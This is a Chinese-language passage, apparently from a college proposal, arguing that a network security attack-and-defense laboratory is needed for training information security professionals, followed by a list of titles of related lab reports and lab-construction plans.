网络安全问题涉及许多学科领域,既包括自然科学,又包括社会科学,覆盖了计算机技术、通信技术、存取控制技术、校验认证技术、容错技术、加密技术、防病毒技术、抗干扰技术、防泄露技术等,是一个非常复杂的综合问题,并且其技术、方法和措施都要随着系统应用环境的变化而不断变化。所以,网络安全是一项复杂且艰巨的任务,需要相关从业人员具备相对较高的素质,既要能高瞻远瞩,对各种威胁做到防患于未然,又要能对各种突发安全事件做出应急响应,把影响和危害减到最小。针对国外的敌对势力及技术封锁,如何建立基于网络安全、自主知识产权下的网络有效管理,也是我国面临的重要课题。培养高精尖信息安全人才对于维护我国的信息主权、全面参与全球经济竞争及经济安全和国家安全至关重要。 在我国,高等院校及各类高职高专是网络安全专业人才的培养基地。网络攻击与防护是网络安全的核心内容,也是国内外各个高校信息安全相关专业的重点教学内容。网络攻击与防护具有工程性、实践性的特点,对课程设计和综合实训提出了更高的实验环境要求。 1.2 建设网络安全实验室必要性 学校如果只开设了网络安全方面的专业课程的学习,而没有网络安全实验室作为实习场所,那么学习理论化的知识,犹如纸上谈兵,严重影响人才培养的质量。建设网络安全实验室,不但能为学生提供良好的硬件资源,而且能大大提高科学研究及学科建设水平,提高办学层次,为培养信息安全高级人才提供有力保证,所以我院非常有必要建设一个现代化,真实化的网络安全实验室。网络安全实验报告综合
网络安全技术实验报告
天融信攻防演练平台及安全实验室建设的解决方案-通用-20130421.docx
网络安全攻防实验室实施方案
网络安全实验报告
网络安全实验报告[整理版]
网络安全实验报告
网络安全实验室方案书上课讲义
信息与工业控制安全实验室规划方案
网络安全实验室方案书.doc
网络安全实验心得
XXX学校信息安全实验室建设方案
网络安全实验
面向攻防实战的信息安全实验室建设方案详细
网络安全技术实验报告实验7计算机及手机病毒防范
(完整版)攻防实验室建设
网络安全实验一
红亚科技网络攻防实验室解决方案